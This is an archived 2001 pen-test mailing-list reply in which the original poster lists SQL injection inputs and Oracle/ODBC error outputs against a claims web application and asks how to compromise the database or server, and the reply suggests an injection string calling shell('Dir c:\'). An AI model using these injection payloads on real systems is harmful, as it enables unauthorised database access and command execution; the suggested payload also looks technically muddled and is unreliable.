Re: SQL INJECTION - ORACLE

From: Michael Haunzwickl (michael.haunzwickl@roehrer.com)
Date: 12/10/01


From: "Michael Haunzwickl" <michael.haunzwickl@roehrer.com>
Date: Mon, 10 Dec 2001 18:25:06 GMT
To: foo bar <badb0t@hotmail.com>

Hm ...

I would try:

Input: „select * from ' & shell („Dir c:\“) & ' sys.tab$“

this will hopefully give you a dir of c:\

Best regards

Der Schakal

>>>>>>>>>>>>>>>>>> Ursprüngliche Nachricht <<<<<<<<<<<<<<<<<<

Am 10.12.2001, 17:06:05, schrieb "foo bar" <badb0t@hotmail.com> zum Thema
SQL INJECTION - ORACLE:

> Hello
> I am performing a vulnerability test against a web application and would
> like some advice. The application is running IIS 4.0 - all the remote
> exploits are patched. The backend is just a bunch of VB scripts, getting
> info from an oracle8 server on AIX.

> Most of the places where input is accepted must strip out unexpected
> characters, but I located one field on a form where input was not
properly
> validated. I've tried posting different strings into the field with
limited
> success. All I'm able to get is errors back. I'd like to take advantage
of
> some stored procedures in oracle. Could you look at the log of my
activity
> below and provide advice on where to go next in order to compromise the
> database, or the server itself? I'd even be happy with the ability to
run a
> successful query through injection. It looks like their using a package
or
> stored procedure to post the query, and I'm having trouble breaking out
of
> it. Is it possible, if so, how should I go about it?

> Input: '
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00907: missing right
> parenthesis

> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128

> Input: ')
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00923: FROM keyword not
found
> where expected

> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128

> Input: ') from
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00903: invalid table name

> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128

> Input: ') from policy
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not
> properly ended

> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128

> Input: ') from policy -- "'"
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80004005'

> [Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong
number
> or types of arguments in call to 'GETPOLICYNUMBER'

> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128

> Input: ') from getpolicynumber -- "'"
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80004005'

> [Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure,
function,
> package, or type is not allowed here

> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line
128

> _________________________________________________________________
> Get your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



Relevant Pages

  • Re: Oracle Database Access via IIS 6.0 ASP Pages on Windows 2003 S
    ... >Oracle 10g Client is installed on the Windows Server. ... >This is my standard DSN Less connection. ... >Microsoft OLE DB Provider for ODBC Drivers error '80004005' ...
    (microsoft.public.inetserver.iis)
  • SQL INJECTION - ORACLE
    ... Microsoft OLE DB Provider for ODBC Drivers error '80040e14' ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: SQL issue
    ... Microsoft OLE DB Provider for ODBC Drivers error '80040e14' ... DB provider instead of ODBC. ... Please reply to the newsgroup. ...
    (microsoft.public.scripting.vbscript)
  • Re: Drivers SQLSetConnectAttr failed
    ... Microsoft OLE DB Provider for ODBC Drivers error '80004005' ... Please reply to the newsgroup. ...
    (microsoft.public.inetserver.asp.db)
  • Re: Oracle & SQL Server
    ... > Then consider to create Views to make it easy to access the remote Oracle ... Microsoft OLE DB Provider for SQL Server ...
    (microsoft.public.sqlserver.server)